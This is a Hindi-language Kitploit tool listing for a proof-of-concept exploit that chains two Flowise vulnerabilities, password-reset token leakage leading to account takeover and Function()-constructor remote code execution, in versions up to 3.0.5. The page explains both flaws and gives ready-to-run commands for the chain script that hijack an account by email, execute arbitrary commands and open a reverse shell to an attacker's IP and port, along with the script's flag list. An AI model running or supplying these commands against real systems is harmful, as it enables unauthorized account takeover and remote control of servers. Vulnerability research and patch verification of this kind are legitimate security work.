Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 और CVE-2025-59528 chain POC | Kitploit
उपकरण/GitHubGitHub/azureadtrent/cve-2025-58434-59528
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरिमोट एक्सेस टूल
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 और CVE-2025-59528 chain POC

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58434 + CVE-2025-59528

दो कमजोरियों के लिए शोषण श्रृंखला जो Flowise <= 3.0.5 को प्रभावित करती हैं।


कमजोरियाँ

CVE-2025-58434 — अप्रमाणित खाता अधिग्रहण

फ़ॉरगॉट-पासवर्ड एंडपॉइंट प्रमाणीकरण की आवश्यकता के बिना API प्रतिक्रिया में एक वैध पासवर्ड रीसेट टोकन लौटाता है। एक हमलावर जो एक वैध ईमेल पता जानता है, बिना उपयोगकर्ता के इंटरैक्शन के किसी भी खाते का पासवर्ड रीसेट कर सकता है।

CVE-2025-59528 — प्रमाणित दूरस्थ कोड निष्पादन

CustomMCP नोड उपयोगकर्ता-नियंत्रित इनपुट को पूर्ण Node.js विशेषाधिकारों के साथ सीधे Function() कंस्ट्रक्टर को भेजता है। एक प्रमाणित उपयोगकर्ता जिसके पास वैध API कुंजी है, Flowise प्रक्रिया उपयोगकर्ता के रूप में मनमाने OS कमांड निष्पादित कर सकता है।

समाधान: Flowise 3.0.6


आवश्यकताएँ

  • Python 3.8+
  • pip install requests

उपयोग

पूर्ण ATO श्रृंखला (पासवर्ड रीसेट करता है, API कुंजी के लिए संकेत देता है, रिवर्स शेल चलाता है):

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

केवल RCE (यदि आपके पास पहले से API कुंजी है):

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

मौजूदा कुंजी के साथ रिवर्स शेल:

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

विकल्प


नोट्स

Flowise 3.0.5 में एक ख़ासियत के कारण, रीसेट-पासवर्ड API एंडपॉइंट लॉगिन एंडपॉइंट द्वारा स्वीकार किए गए क्रेडेंशियल को तुरंत अपडेट नहीं करता है। स्क्रिप्ट रीसेट के बाद रुक जाती है और आपको मैन्युअल रूप से UI में लॉग इन करने और /apikey से API कुंजी कॉपी करने का संकेत देती है।

टूल डाउनलोड करें
फ़्लैगविवरण
-t, --targetलक्ष्य URL
-e, --emailलक्ष्य खाता ईमेल (ATO श्रृंखला को ट्रिगर करता है)
--api-keyसीधे API कुंजी प्रदान करें (ATO छोड़ें)
-c, --commandनिष्पादित करने के लिए कमांड
--lhostरिवर्स शेल के लिए हमलावर IP
--lportरिवर्स शेल के लिए हमलावर पोर्ट (डिफ़ॉल्ट: 4444)
--new-passwordरीसेट के दौरान सेट करने के लिए पासवर्ड (डिफ़ॉल्ट: Pwn3d!2026)
-k, --insecureTLS सत्यापन छोड़ें